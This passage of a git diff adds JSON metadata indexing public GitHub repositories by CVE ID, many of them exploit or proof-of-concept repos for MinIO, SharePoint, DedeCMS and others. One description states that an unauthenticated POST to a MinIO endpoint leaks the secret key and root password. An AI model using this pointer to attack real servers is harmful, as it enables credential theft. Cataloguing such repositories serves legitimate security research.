+ "html_url": "https:\/\/github.com\/Vulmatch\/CVE-2023-28252",
+ "description": "The TL;DR for the learnings of Windows Vulnerability CVE-2023-28252",
+ "fork": false,
+ "created_at": "2024-06-16T12:35:57Z",
+ "updated_at": "2024-06-16T13:06:54Z",
+ "pushed_at": "2024-06-16T13:06:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28329.json b/2023/CVE-2023-28329.json
new file mode 100644
index 0000000000..5c978ed521
--- /dev/null
+++ b/2023/CVE-2023-28329.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 706569754,
+ "name": "CVE-2023-28329",
+ "full_name": "cli-ish\/CVE-2023-28329",
+ "owner": {
+ "login": "cli-ish",
+ "id": 22986332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4",
+ "html_url": "https:\/\/github.com\/cli-ish"
+ },
+ "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-28329",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-18T07:58:04Z",
+ "updated_at": "2023-10-18T07:58:05Z",
+ "pushed_at": "2023-10-18T07:58:05Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28330.json b/2023/CVE-2023-28330.json
new file mode 100644
index 0000000000..9af9c308e7
--- /dev/null
+++ b/2023/CVE-2023-28330.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 706569827,
+ "name": "CVE-2023-28330",
+ "full_name": "cli-ish\/CVE-2023-28330",
+ "owner": {
+ "login": "cli-ish",
+ "id": 22986332,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22986332?v=4",
+ "html_url": "https:\/\/github.com\/cli-ish"
+ },
+ "html_url": "https:\/\/github.com\/cli-ish\/CVE-2023-28330",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-18T07:58:16Z",
+ "updated_at": "2023-10-18T07:58:16Z",
+ "pushed_at": "2023-10-18T07:58:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28343.json b/2023/CVE-2023-28343.json
new file mode 100644
index 0000000000..33bf001169
--- /dev/null
+++ b/2023/CVE-2023-28343.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 661672662,
+ "name": "CVE-2023-28343",
+ "full_name": "hba343434\/CVE-2023-28343",
+ "owner": {
+ "login": "hba343434",
+ "id": 120598843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120598843?v=4",
+ "html_url": "https:\/\/github.com\/hba343434"
+ },
+ "html_url": "https:\/\/github.com\/hba343434\/CVE-2023-28343",
+ "description": "CVE-2023-28343",
+ "fork": false,
+ "created_at": "2023-07-03T11:48:21Z",
+ "updated_at": "2023-07-06T15:42:44Z",
+ "pushed_at": "2023-07-03T11:50:59Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28432.json b/2023/CVE-2023-28432.json
new file mode 100644
index 0000000000..998dbba591
--- /dev/null
+++ b/2023/CVE-2023-28432.json
@@ -0,0 +1,242 @@
+[
+ {
+ "id": 681035124,
+ "name": "CVE-2023-28432",
+ "full_name": "bingtangbanli\/CVE-2023-28432",
+ "owner": {
+ "login": "bingtangbanli",
+ "id": 77956516,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77956516?v=4",
+ "html_url": "https:\/\/github.com\/bingtangbanli"
+ },
+ "html_url": "https:\/\/github.com\/bingtangbanli\/CVE-2023-28432",
+ "description": "CVE-2023-28432检测工具",
+ "fork": false,
+ "created_at": "2023-08-21T06:03:25Z",
+ "updated_at": "2023-08-28T03:20:30Z",
+ "pushed_at": "2023-08-26T15:30:00Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 687511506,
+ "name": "CVE-2023-28432",
+ "full_name": "Chocapikk\/CVE-2023-28432",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-28432",
+ "description": "Automated vulnerability scanner for CVE-2023-28432 in Minio deployments, revealing sensitive environment variables.",
+ "fork": false,
+ "created_at": "2023-09-05T14:01:53Z",
+ "updated_at": "2024-04-26T05:19:25Z",
+ "pushed_at": "2023-09-05T14:02:34Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 707634565,
+ "name": "CVE-2023-28432",
+ "full_name": "yTxZx\/CVE-2023-28432",
+ "owner": {
+ "login": "yTxZx",
+ "id": 100921463,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100921463?v=4",
+ "html_url": "https:\/\/github.com\/yTxZx"
+ },
+ "html_url": "https:\/\/github.com\/yTxZx\/CVE-2023-28432",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-10-20T10:20:10Z",
+ "updated_at": "2024-01-12T02:54:35Z",
+ "pushed_at": "2023-10-20T10:26:05Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 723777809,
+ "name": "CVE-2023-28432-minio_update_rce",
+ "full_name": "unam4\/CVE-2023-28432-minio_update_rce",
+ "owner": {
+ "login": "unam4",
+ "id": 66824584,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66824584?v=4",
+ "html_url": "https:\/\/github.com\/unam4"
+ },
+ "html_url": "https:\/\/github.com\/unam4\/CVE-2023-28432-minio_update_rce",
+ "description": "https:\/\/github.com\/AbelChe\/evil_minio\/tree\/main 打包留存",
+ "fork": false,
+ "created_at": "2023-11-26T18:23:33Z",
+ "updated_at": "2023-11-26T18:35:08Z",
+ "pushed_at": "2023-11-26T18:36:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 728488310,
+ "name": "CVE-2023-28432",
+ "full_name": "C1ph3rX13\/CVE-2023-28432",
+ "owner": {
+ "login": "C1ph3rX13",
+ "id": 80873500,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4",
+ "html_url": "https:\/\/github.com\/C1ph3rX13"
+ },
+ "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-28432",
+ "description": "CVE-2023-28432 Minio Information isclosure Exploit",
+ "fork": false,
+ "created_at": "2023-12-07T03:33:37Z",
+ "updated_at": "2023-12-07T19:37:00Z",
+ "pushed_at": "2023-12-25T09:41:34Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 740067240,
+ "name": "CVE-2023-28432",
+ "full_name": "netuseradministrator\/CVE-2023-28432",
+ "owner": {
+ "login": "netuseradministrator",
+ "id": 96680088,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96680088?v=4",
+ "html_url": "https:\/\/github.com\/netuseradministrator"
+ },
+ "html_url": "https:\/\/github.com\/netuseradministrator\/CVE-2023-28432",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-07T12:34:49Z",
+ "updated_at": "2024-01-31T02:25:36Z",
+ "pushed_at": "2024-01-07T15:20:56Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 741968176,
+ "name": "CVE-2023-28432",
+ "full_name": "xk-mt\/CVE-2023-28432",
+ "owner": {
+ "login": "xk-mt",
+ "id": 77874955,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77874955?v=4",
+ "html_url": "https:\/\/github.com\/xk-mt"
+ },
+ "html_url": "https:\/\/github.com\/xk-mt\/CVE-2023-28432",
+ "description": "minio系统存在信息泄露漏洞,未经身份认证的远程攻击,通过发送特殊POST请求到\/minio\/bootstrap\/v1\/verify即可获取所有敏感信息,其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,可能导致管理员账号密码泄露。",
+ "fork": false,
+ "created_at": "2024-01-11T13:41:20Z",
+ "updated_at": "2024-01-11T14:56:48Z",
+ "pushed_at": "2024-01-15T08:35:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 786121269,
+ "name": "CVE-2023-28432",
+ "full_name": "0xRulez\/CVE-2023-28432",
+ "owner": {
+ "login": "0xRulez",
+ "id": 103935434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103935434?v=4",
+ "html_url": "https:\/\/github.com\/0xRulez"
+ },
+ "html_url": "https:\/\/github.com\/0xRulez\/CVE-2023-28432",
+ "description": "MinIO vulnerability exploit - CVE-2023-28432",
+ "fork": false,
+ "created_at": "2024-04-13T13:52:43Z",
+ "updated_at": "2024-04-13T13:58:09Z",
+ "pushed_at": "2024-04-13T13:56:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28467.json b/2023/CVE-2023-28467.json
new file mode 100644
index 0000000000..4887cc0065
--- /dev/null
+++ b/2023/CVE-2023-28467.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 669606296,
+ "name": "CVE-2023-28467",
+ "full_name": "ahmetaltuntas\/CVE-2023-28467",
+ "owner": {
+ "login": "ahmetaltuntas",
+ "id": 12846006,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12846006?v=4",
+ "html_url": "https:\/\/github.com\/ahmetaltuntas"
+ },
+ "html_url": "https:\/\/github.com\/ahmetaltuntas\/CVE-2023-28467",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-22T20:37:15Z",
+ "updated_at": "2023-11-17T00:57:47Z",
+ "pushed_at": "2023-07-22T21:06:26Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-28588.json b/2023/CVE-2023-28588.json
new file mode 100644
index 0000000000..f442010449
--- /dev/null
+++ b/2023/CVE-2023-28588.json
@@ -0,0 +1,182 @@
+[
+ {
+ "id": 742448622,
+ "name": "CVE-2023-28588",
+ "full_name": "uthrasri\/CVE-2023-28588",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T13:59:34Z",
+ "updated_at": "2024-01-12T14:02:22Z",
+ "pushed_at": "2024-01-19T10:56:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 742454957,
+ "name": "CVE-2023-28588",
+ "full_name": "Trinadh465\/CVE-2023-28588",
+ "owner": {
+ "login": "Trinadh465",
+ "id": 102574296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4",
+ "html_url": "https:\/\/github.com\/Trinadh465"
+ },
+ "html_url": "https:\/\/github.com\/Trinadh465\/CVE-2023-28588",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-12T14:15:42Z",
+ "updated_at": "2024-01-12T16:38:02Z",
+ "pushed_at": "2024-01-12T14:20:08Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 742472564,
+ "name": "CVE-2023-28588_system_bt",
+ "full_name": "uthrasri\/CVE-2023-28588_system_bt",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_system_bt",
+ "description": "system_bt_CVE-2023-28588",
+ "fork": false,
+ "created_at": "2024-01-12T14:58:59Z",
+ "updated_at": "2024-01-12T15:00:53Z",
+ "pushed_at": "2024-01-12T15:13:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745490193,
+ "name": "CVE-2023-28588_Singlefile",
+ "full_name": "uthrasri\/CVE-2023-28588_Singlefile",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_Singlefile",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-19T12:58:22Z",
+ "updated_at": "2024-01-19T13:06:38Z",
+ "pushed_at": "2024-01-19T13:07:11Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 745534292,
+ "name": "G2.5_CVE-2023-28588",
+ "full_name": "uthrasri\/G2.5_CVE-2023-28588",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/G2.5_CVE-2023-28588",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-19T14:46:51Z",
+ "updated_at": "2024-01-19T14:46:51Z",
+ "pushed_at": "2024-01-19T14:46:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 746664124,
+ "name": "CVE-2023-28588_G2.5_singlefile",
+ "full_name": "uthrasri\/CVE-2023-28588_G2.5_singlefile",
+ "owner": {
+ "login": "uthrasri",
+ "id": 145666390,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4",
+ "html_url": "https:\/\/github.com\/uthrasri"
+ },
+ "html_url": "https:\/\/github.com\/uthrasri\/CVE-2023-28588_G2.5_singlefile",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-01-22T13:17:35Z",
+ "updated_at": "2024-01-22T13:18:30Z",
+ "pushed_at": "2024-01-22T13:19:28Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2868.json b/2023/CVE-2023-2868.json
new file mode 100644
index 0000000000..d513c8cd6a
--- /dev/null
+++ b/2023/CVE-2023-2868.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 672605144,
+ "name": "CVE-2023-2868CVE-2023-2868",
+ "full_name": "cashapp323232\/CVE-2023-2868CVE-2023-2868",
+ "owner": {
+ "login": "cashapp323232",
+ "id": 64687677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64687677?v=4",
+ "html_url": "https:\/\/github.com\/cashapp323232"
+ },
+ "html_url": "https:\/\/github.com\/cashapp323232\/CVE-2023-2868CVE-2023-2868",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-30T16:42:27Z",
+ "updated_at": "2023-07-30T16:42:27Z",
+ "pushed_at": "2023-08-05T12:24:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 683041709,
+ "name": "CVE-2023-2868",
+ "full_name": "krmxd\/CVE-2023-2868",
+ "owner": {
+ "login": "krmxd",
+ "id": 48358384,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48358384?v=4",
+ "html_url": "https:\/\/github.com\/krmxd"
+ },
+ "html_url": "https:\/\/github.com\/krmxd\/CVE-2023-2868",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-08-25T13:07:51Z",
+ "updated_at": "2023-08-25T13:07:51Z",
+ "pushed_at": "2023-08-25T13:08:59Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29017.json b/2023/CVE-2023-29017.json
new file mode 100644
index 0000000000..99c2861070
--- /dev/null
+++ b/2023/CVE-2023-29017.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 668528727,
+ "name": "CVE-2023-29017-reverse-shell",
+ "full_name": "passwa11\/CVE-2023-29017-reverse-shell",
+ "owner": {
+ "login": "passwa11",
+ "id": 112363374,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112363374?v=4",
+ "html_url": "https:\/\/github.com\/passwa11"
+ },
+ "html_url": "https:\/\/github.com\/passwa11\/CVE-2023-29017-reverse-shell",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-07-20T03:04:26Z",
+ "updated_at": "2023-12-27T16:19:20Z",
+ "pushed_at": "2023-04-10T20:24:41Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2916.json b/2023/CVE-2023-2916.json
new file mode 100644
index 0000000000..7d2ed2263f
--- /dev/null
+++ b/2023/CVE-2023-2916.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 678836726,
+ "name": "CVE-2023-2916",
+ "full_name": "d0rb\/CVE-2023-2916",
+ "owner": {
+ "login": "d0rb",
+ "id": 10403781,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4",
+ "html_url": "https:\/\/github.com\/d0rb"
+ },
+ "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-2916",
+ "description": "CVE-2023-2916 PoC",
+ "fork": false,
+ "created_at": "2023-08-15T13:51:38Z",
+ "updated_at": "2023-08-15T13:53:04Z",
+ "pushed_at": "2023-08-15T13:53:22Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-2928.json b/2023/CVE-2023-2928.json
new file mode 100644
index 0000000000..423313bd74
--- /dev/null
+++ b/2023/CVE-2023-2928.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 702913218,
+ "name": "DedeCMS-getshell-CVE-2023-2928-",
+ "full_name": "CN016\/DedeCMS-getshell-CVE-2023-2928-",
+ "owner": {
+ "login": "CN016",
+ "id": 108575004,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108575004?v=4",
+ "html_url": "https:\/\/github.com\/CN016"
+ },
+ "html_url": "https:\/\/github.com\/CN016\/DedeCMS-getshell-CVE-2023-2928-",
+ "description": "DedeCMS文件包含漏洞导致后台getshell(CVE-2023-2928)复现",
+ "fork": false,
+ "created_at": "2023-10-10T08:46:17Z",
+ "updated_at": "2023-11-28T06:56:45Z",
+ "pushed_at": "2023-10-10T08:46:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29357.json b/2023/CVE-2023-29357.json
new file mode 100644
index 0000000000..db7837fc34
--- /dev/null
+++ b/2023/CVE-2023-29357.json
@@ -0,0 +1,159 @@
+[
+ {
+ "id": 696891493,
+ "name": "CVE-2023-29357",
+ "full_name": "Chocapikk\/CVE-2023-29357",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-29357",
+ "description": "Microsoft SharePoint Server Elevation of Privilege Vulnerability",
+ "fork": false,
+ "created_at": "2023-09-26T16:18:41Z",
+ "updated_at": "2024-06-21T00:11:33Z",
+ "pushed_at": "2023-09-26T19:04:21Z",
+ "stargazers_count": 213,
+ "watchers_count": 213,
+ "has_discussions": false,
+ "forks_count": 31,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2023-24955",
+ "cve-2023-29357",
+ "exploit",
+ "infosec",
+ "microsoft",
+ "sharepoint"
+ ],
+ "visibility": "public",
+ "forks": 31,
+ "watchers": 213,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 698771899,
+ "name": "CVE-2023-29357",
+ "full_name": "LuemmelSec\/CVE-2023-29357",
+ "owner": {
+ "login": "LuemmelSec",
+ "id": 58529760,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58529760?v=4",
+ "html_url": "https:\/\/github.com\/LuemmelSec"
+ },
+ "html_url": "https:\/\/github.com\/LuemmelSec\/CVE-2023-29357",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-30T23:17:04Z",
+ "updated_at": "2024-06-21T00:11:34Z",
+ "pushed_at": "2023-10-10T19:00:30Z",
+ "stargazers_count": 48,
+ "watchers_count": 48,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 48,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 703043275,
+ "name": "CVE-2023-29357-ExE",
+ "full_name": "KeyStrOke95\/CVE-2023-29357-ExE",
+ "owner": {
+ "login": "KeyStrOke95",
+ "id": 12446252,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12446252?v=4",
+ "html_url": "https:\/\/github.com\/KeyStrOke95"
+ },
+ "html_url": "https:\/\/github.com\/KeyStrOke95\/CVE-2023-29357-ExE",
+ "description": "Recreation of the SharePoint PoC for CVE-2023-29357 in C# from LuemmelSec",
+ "fork": false,
+ "created_at": "2023-10-10T13:41:21Z",
+ "updated_at": "2024-02-17T23:21:40Z",
+ "pushed_at": "2023-10-10T13:44:08Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 734652064,
+ "name": "cve-2023-29357-Sharepoint",
+ "full_name": "Guillaume-Risch\/cve-2023-29357-Sharepoint",
+ "owner": {
+ "login": "Guillaume-Risch",
+ "id": 60431931,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60431931?v=4",
+ "html_url": "https:\/\/github.com\/Guillaume-Risch"
+ },
+ "html_url": "https:\/\/github.com\/Guillaume-Risch\/cve-2023-29357-Sharepoint",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-12-22T08:42:00Z",
+ "updated_at": "2024-01-24T09:46:07Z",
+ "pushed_at": "2023-12-22T08:49:59Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 737886117,
+ "name": "CVE-2023-29357-Check",
+ "full_name": "Jev1337\/CVE-2023-29357-Check",
+ "owner": {
+ "login": "Jev1337",
+ "id": 19759761,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19759761?v=4",
+ "html_url": "https:\/\/github.com\/Jev1337"
+ },
+ "html_url": "https:\/\/github.com\/Jev1337\/CVE-2023-29357-Check",
+ "description": "A Python script that verifies whether a target is vulnerable to CVE-2023-29357 or not",
+ "fork": false,
+ "created_at": "2024-01-01T21:08:22Z",
+ "updated_at": "2024-01-05T14:13:11Z",
+ "pushed_at": "2024-01-01T21:13:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2023/CVE-2023-29360.json b/2023/CVE-2023-29360.json
